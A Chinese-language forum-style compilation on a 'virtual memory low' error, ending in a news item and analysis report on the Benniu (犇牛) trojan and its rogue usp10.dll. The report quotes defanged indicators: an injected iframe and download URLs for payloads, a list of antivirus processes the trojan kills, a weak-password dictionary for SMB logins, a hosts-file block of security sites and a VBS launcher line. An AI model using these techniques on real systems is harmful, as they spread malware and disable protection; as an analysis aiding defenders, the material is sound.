爲何有的電腦重裝系統還會出現虛擬內存低的??--非C盤下的usp10.dll在作怪(犇牛***)

一、感染病毒

有些病毒發做時會佔用大量內存空間，致使系統出現內存不足的問題。趕快去殺毒，升級病毒庫，而後把防毒措施作好!

二、虛擬內存設置不當

虛擬內存設置不當也可能致使出現內存不足問題，通常狀況下，虛擬內存大小爲物理內存大小的2倍便可，若是設置得太小，就會影響系統程序的正常運行。從新調整虛擬內存大小以WinXP爲例，右鍵點擊「個人電腦」，選擇「屬性」，而後在「高級」標籤頁，點擊「性能」框中的「設置」按鈕，切換到「高級」標籤頁，而後在「虛擬內存」框中點擊「更改」按鈕，接着從新設置虛擬內存大小，完成後從新啓動系統就行了。

三、系統空間不足

虛擬內存文件默認是在系統盤中，如WinXP的虛擬內存文件名爲「pagefile.sys」，若是系統盤剩餘空間太小，致使虛擬內存不足，也會出現內存不足的問題。系統盤至少要保留300MB剩餘空間，固然這個數值要根據用戶的實際須要而定。用戶儘可能不要把各類應用軟件安裝在系統盤中，保證有足夠的空間供虛擬內存文件使用，並且最好把虛擬內存文件安放到非系統盤中。

四、由於SYSTEM用戶權限設置不當

基於NT內核的Windows系統啓動時，SYSTEM用戶會爲系統建立虛擬內存文件。有些用戶爲了系統的安全，採用NTFS文件系統，但卻取消了SYSTEM用戶在系統盤「寫入」和「修改」的權限，這樣就沒法爲系統建立虛擬內存文件，運行大型程序時，也會出現內存不足的問題。問題很好解決，只要從新賦予SYSTEM用戶「寫入」和「修改」的權限便可，不過這個僅限於使用NTFS文件系統的用戶。

虛擬內存的優化

1. 啓用磁盤寫入緩存

在「個人電腦」上單擊鼠標右鍵選擇「屬性->硬件」，打開設備管理器找到當前正在使用的硬盤，單擊鼠標右鍵選擇屬性。在硬盤屬性的的「策略」頁中，打開「啓用磁盤上的寫入緩存」。

這個選項將會激活硬盤的寫入緩存，從而提升硬盤的讀寫速度。不過要注意一點，這個功能打開後，若是計算機忽然斷電可能會致使沒法挽回的數據丟失。所以最好在有UPS的狀況下再打開這個功能。固然，若是你日常使用計算機時不要進行什麼重要的數據處理工做，沒有UPS也無所謂，這個功能不會對系統形成太大的損失。

2. 打開Ultra MDA

在設備管理其中選擇IDE ATA/ATAPI控制器中的「基本/次要IDE控制器」，單擊鼠標右鍵選擇「屬性」，打開「高級設置」頁。這裏最重要的設置項目就是「傳輸模式」，通常應當選擇「DMA（若可用）」。

3. 配置恢復選項

Windows XP 運行過程當中碰到致命錯誤時會將內存的快照保存爲一個文件，以便進行系統調試時使用，對於大多數普通用戶而言，這個文件是沒有什麼用處的，反而會影響虛擬內存的性能。因此應當將其關閉。

在「個人電腦」上單擊鼠標右鍵，選擇「屬性->高級」，在「性能」下面單擊「設置」按鈕，在「性能選項」中選擇「高級」頁。這裏有一個「內存使用」選項，若是將其設置爲「系統緩存」，Windows XP 將使用約4MB的物理內存做爲讀寫硬盤的緩存，這樣就能夠大大提升物理內存和虛擬內存之間的數據交換速度。默認狀況下，這個選項是關閉的，若是計算機的物理內存比較充足，好比256M或者更多，最好打開這個選項。可是若是物理內存比較緊張，仍是應當保留默認的選項。
至於重裝系統，若是真的能夠經過設置虛擬內存或者殺毒之類，是系統正常運做，仍是建議不要重裝～
usp10.dll　usp10.dll (1.409.2600.1106)

　　包含在軟件

　　名字: Windows XP Home Edition, Deutsch

　　信息連接: [url]http://www.microsoft.com/windowsxp/[/url]

　　文件細節

　　文件道路: C:\WINDOWS\system32 \ usp10.dll

　　文件日期: 2002-08-29 14:00:00

　　版本: 1.409.2600.1106

　　文件大小: 339.456 字節

　　檢查和和文件hashes

　　CRC32: 9DA76CA6

　　MD5: 06E2 217D 2AF7 50D6 69C8 AACE DD28 090B

　　SHA1: 7B9A 2876 45A6 A25B 8867 0229 49FE D6E6 816F 6A32

　　版本資源信息

　　公司名稱: Microsoft Corporation

　　文件描述: Uniscribe Unicode . processor

　　文件操做系統: Windows NT, Windows 2000, Windows XP, Windows 2003

　　文件類型: Dynamic Link Library (DLL)

　　文件版本: 1.409.2600.1106

　　內部名: Uniscribe

　　法律版權: Microsoft Corporation. All rights reserved.

　　原始的文件名: Uniscribe

　　產品名稱: Microsoft(R) Uniscribe Unicode . processor

　　產品版本: 1.409.2600.1106

　　用途：usp10.dll是字符顯示腳本應用程序接口相關文件。也可能爲病毒

　　安全等級 (0-5): 0 (N/A無危險 5最危險)

　　間諜軟件: 可能

　　廣告軟件: 否

　　病毒: 可能

　　***: 可能

　　系統進程: 是

　　應用程序: 否

　　後臺程序: 否

　　使用訪問: 否

　　訪問互聯網: 否

　　 解決方法：

　　嘗試運行"sfc /scannow"，檢查一下系統文件

　　部分可能爲病毒文件:

　　部分新出現的usp10.dll多是病毒,只要他們沒有出如今系統文件夾內就頗有多是病毒.其做用原理爲當和該文件同一文件夾的程序運行後,usp10.dll首先發揮做用,實現上病毒網站下載***的功能.最新的卡巴已經能夠刪除這種病毒.
    近段時間，一種名爲犇牛的***大量爆發，該病毒用通常的方法難以清除，其威力不比機器狗差，中毒現象：系統速度明顯變慢，殺毒軟件莫名其妙的被卸載或禁用，下載軟件（如迅雷等）失效，打開進程管理器會發現進程裏面有幾個數字的進程......該病毒用通常的方法不能清除，屬頑固***，你們不要浪費時間用殺毒軟件盲目的去查殺，若是電腦裏面文件不重要的話奉勸你們從新裝下系統，文件重要的話就勉強用360的專殺工具查殺下（據我經驗，效果不明顯，專殺地址 [url]http://www.360.cn/killer/360compkill.html[/url] ）。這裏我重點提醒下你們重裝系統後要作的事情：裝完系統不要當即進入系統，由於該***能在其餘各個分區目錄下的文件夾下生成一個名爲USP10.DLL的文件，你裝完系統的話當即打開盤就會立刻觸發***，只要一聯網該***就會立刻從網上下載大量的***，因此裝完系統最好用盤導進PE系統（沒的話開機按F8進入安全模式），進入電腦後用資源管理器的形式打開「個人電腦」，而後把隱藏文件打開（工具——文件夾選項——查看——把「隱藏受保護的操做系統文件（推薦）」勾去掉把下面的顯示全部文件和文件件的勾勾上，點肯定），而後點搜索，在搜索欄裏面填上usp10.dll，而後點搜索（不要敲回車），搜出來的文件除一個顯形的usp10.dll文件保留（該文件後面註釋是styem32的路徑且日期和其餘的不一樣）除這個文件外其餘的所有刪掉就能夠了。（在病毒沒清除乾淨以後不要聯網）

usp10.dll專殺工具_劍盟出品

http://www.ttshadu.cn/SoftView/Soft11/1345.html

注意  查殺後要手動替換   ctfmon.exe     文件(注意各個系統的版本對應)  由於感染後的ctfmon.exe文件即便裝了影子也會被惡意驅動穿透保留下來  並且會釋放一個dll病毒在臨時文件夾  隱藏選項修改不過來就是其中表現之一！結束掉被替換的ctfmon.exe程序 用程序上提供的地址下載正常版本替換過來便是！

ps：添加了baohe說的那些病毒文件庫！

ps：重裝系統的狀況下  要先運行本軟件  查殺一遍後清除殘留文件 再實用別的軟件  不然會優先啓動病毒文件 重裝就沒意義了 記得要斷網查殺哦！

昨日，360安全中心緊急發佈信息：春節剛過，忽然出現以「犇牛」爲名字開頭的惡性***病毒，統稱爲「牛病毒」，已有湖北電腦感染，用戶即便重裝系統，也無濟於事。 電腦中了「牛病毒」後，運行速度慢如老牛，非系統盤的根目錄及全部文件夾目錄中同時出現「usp10.dll」文件。部分中毒的電腦會彈出大量廣告網頁、殺毒軟件遭強制卸載等各類病症，會自動下載大量***病毒。用戶只能將全部硬盤分區全盤格式化，不然即使重裝系統後，「牛病毒」仍在。 360安全專家石曉虹博士介紹，牛病毒使用了「安軟殺手」對主流殺毒軟進行卸載和破壞，致使迅雷等下載軟件失效。
來自360安全中心的數據顯示，從2月9日開始，以釋放「wsock32．dll」爲主要特徵之一的「犇牛」新種——「犇牛2」的單日查殺量首度超過了「犇牛」，達100萬次以上，至此，「犇牛系」***已累計感染電腦超過150萬臺。
　　360安全專家石曉虹博士告訴記者，「咱們徹底有理由相信，‘犇牛’的背後隱藏着一個組織嚴密、技術高超、反應迅速的***病毒研發團伙，其目標不只是要與安全廠商對抗，更是瞄準了3億網民電腦中的數字財富。」
　　石曉虹提醒廣大電腦用戶，「犇牛」變種「犇牛2」的生命力甚至強於「熊貓燒香」病毒，目前已成爲「犇牛」系主力軍。360安全中心對此發出橙色***病毒預警，並緊急推出最新版「360頑固***專殺大全」。
　　石曉虹博士表示，依據「犇牛」目前新變種的更新速度以及破壞性，將來一段時間內，「犇牛」依然是威脅互聯網安全的最大隱患。***製做團伙隨時有可能推出「犇牛」其餘變種，網民千萬不能掉以輕心。
　　據悉，目前已知的「犇牛」傳播途徑爲訪問掛馬網頁、帶毒移動存儲的感染以及局域網主動***，石曉虹提醒廣大網民，必須儘快修復操做系統及第三方軟件漏洞，打開安全軟件的U盤防火牆後再使用U盤、數碼產品等移動存儲介質，並推薦使用360安全瀏覽器等具備防掛馬功能的瀏覽器，避免受到「犇牛」侵襲，給本身的數據安全和虛擬財產帶來損失。

 

犇牛對抗安全廠商　安全團隊解析變種特徵

犇牛是年初以來傳播手段最綜合的 ***，傳播手段與當年的「磁碟機」***和「熊貓燒香」 病毒相似，能把***種子插入電腦中的全部html網頁文件和rar壓縮文件，具有了「全盤感染」的能力。

           中了「犇牛」後，症狀很是容易判斷，特徵有二：

          1.電腦特別慢；

          2.非 系統盤下每一個文件夾目錄都多出來一個不正常的dll文件，常常會跳出「虛擬內存不足」的提示。用戶重裝系統或者用ghost系統還原都不能解決，除非全盤格式化。這是因爲犇牛劫持了.dll文件，並刪除了.gho鏡像文件所致。

        犇牛會在中招的電腦上劃分勢力範圍，不讓其它***下載勢力染指，這個很少見，因而可知***行業內部競爭也日趨激烈。犇牛下載的***不少都出自知名盜號工做室(五家以上)，主要是網遊盜號***。

       如今犇牛的製做團隊正在跟安全廠商進行一場正面對抗。目前絕大部分殺毒軟件都殺不乾淨或被強行關閉、卸載，這一點各安全廠商論壇上都有用戶的求助信息。下面就給出犇牛變種的分析報告。

         犇牛變種分析報告

        一、遍歷全盤中的Gho、GHO、gho文件，找到就刪除。 二、遍歷全盤中的 jsp、php、aspx、asp、htm、html文件，找到就向文件尾部插入

<iframe src=hxxp://derek.kalengzi.cn/a.htm width=100 height=0></iframe>

進行網馬傳播。

           三、經過 hxxp://down.skydows.cn/down.txt 這個下載列表，下載大量***。

           四、直接下載hxxp://w.ssddffgg.cn/me.exe，拷貝爲c:\__default.pif，運行並進行自我更新。

           五、向hxxp://w.ssddffgg.cn/7/get.asp發送本機信息，用來統計中招用戶信息。

           六、釋放感染***到c:\windows\ini目錄下，並寫入desktop.ini用來假裝成回收站。達到隱藏文件的目的。

           七、遍歷進行，發現下面的進程則嘗試結束關閉：

rfwproxy.exe、rfwmain.exe、rfwsrv.exe、Navapsvc.exe、Navapw32.exe、EGHOST.EXE、FileDsty.exe、RavTask.exe、RavMonD.exe、UlibCfg.exe、CCenter.exe、RavMon.exe、RavLite.exe、Rav.exe、kasmain.exe、kissvc.exe、kavstart.exe、kwatch.exe、kav32.exe、360Safe.exe、avp.exe、vptray.exe、mmsk.exe、THGUARD.EXE、TrojanHunter.exe、TBSCAN.EXE、WEBSCANX.EXE、Iparmor.exe、PFW.exe、AST.exe、ast.exe、360tray.exe

          八、遍歷當前激活面板，若是面板父窗口含有如下關鍵字，則發送關閉消息關閉面板控件：

殺毒、worm、卡巴斯基、×××、江民、離線升級包、金山、Anti、anti、Virus、virus、Firewall、檢測、Mcafee、病毒、查殺、狙劍、防火牆、主動防護、微點、防護、系統保護、綠鷹、主動、殺馬、***、感染、清除器、上報、舉 報、舉報、瑞星、進 程、進程、低 安全、Process、NOD32、攔截、監控、安全衛士、監視、專殺

         九、寫Autorun.inf進行U盤傳播。 文件寫入recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe，且在該目錄下建了一個「safe../"的畸形文件夾，用來防止刪除recycle.{645FF040-5081-101B-9F08-00AA002F954E}目錄。

        十、調用 Windows系統函數WNetAddConnection2A來鏈接其它主機的Windows文件共享和遠程訪問端口(445)，一旦鏈接成功，使用如下密碼字典(含空口令)嘗試登陸administrator帳戶：

movie、woaini、baby、asdf、NULL、angel、asdfgh、1314520、520131四、caonima、8888八、bbbbbb、1234567八、memory、abc12三、qwerty、12345六、1十一、password、new、enter、hack、xpuser、money、yeah、time、123456movie、game、user、alex、guest、admin、test、administrator、root、nn、12三、xp、love、home

若是登陸成功，則向目標主機各共享文件夾下寫入一個kav32.exe的自身拷貝。

       十一、向c:\windows\ini目錄下寫入wsock32.dll，並將該dll複製到硬盤的每個目錄下(系統的目錄除外)。

       十二、向c:\windows\tasks目錄下寫入「安裝.bat」，爲插入壓縮包做準備。

       1三、遍歷全部目錄下的tar、cab、tgz、zip、rar文件，並調用"%ProgramFiles%"目錄下的\WinRAR\Rar.exe，使用命令行參數將c:\windows\tasks\安裝.bat添加到這些壓縮包中。

       1四、修改host表，屏蔽安全廠商網站：

# ****下面是惡意網站127.0.0.0 360.qihoo.com127.0.0.1 qihoo.com127.0.0.1 www.qihoo.com127.0.0.1 www.qihoo.cn127.0.0.1 124.40.51.17127.0.0.1 58.17.236.92',0127.0.0.1 www.kaspersky.com27.0.0.1 60.210.176.251127.0.0.1 www.cnnod32.cn127.0.0.1 www.lanniao.org127.0.0.1 www.nod32club.com127.0.0.1 www.dswlab.com127.0.0.1 bbs.sucop.com127.0.0.1 www.virustotal.com127.0.0.1 tool.ikaka.com,0127.0.0.1 www.jiangmin.com203.208.37.99 www.duba.net127.0.0.1 www.eset.com.cn127.0.0.1 www.nod32.com203.208.37.99 shadu.duba.net203.208.37.99 union.kingsoft.com127.0.0.1 www.kaspersky.com.cn127.0.0.1 kaspersky.com.cn127.0.0.1 virustotal.com,0127.0.0.1 www.360.cn127.0.0.1 www.360safe.cn127.0.0.1 www.360safe.com127.0.0.1 www.chinakv.com127.0.0.1 www.rising.com.cn127.0.0.1 rising.com.cn127.0.0.1 dl.jiangmin.com127.0.0.1 jiangmin.com,0

        1五、刪除金山 通行證的記錄信息，達到破壞 金山毒霸升級的目的。

c:\documents and settings\all users\application data\kingsoft\kis\log.datc:\documents and settings\all users\application data\kingsoft\kis\user.dat

        1六、破壞安全模式及帶網絡的安全模式。 1七、向%windir%\ini\目錄下的shit.vbs寫入以下內容：

On Error Resume NextSet rs=createObject("W..shell")rs.run "%windir%\ini\ini.exe",0

並調用該VBS啓動ini.exe。 1八、查找AfxControlBar42s窗口類，用來關閉IceSword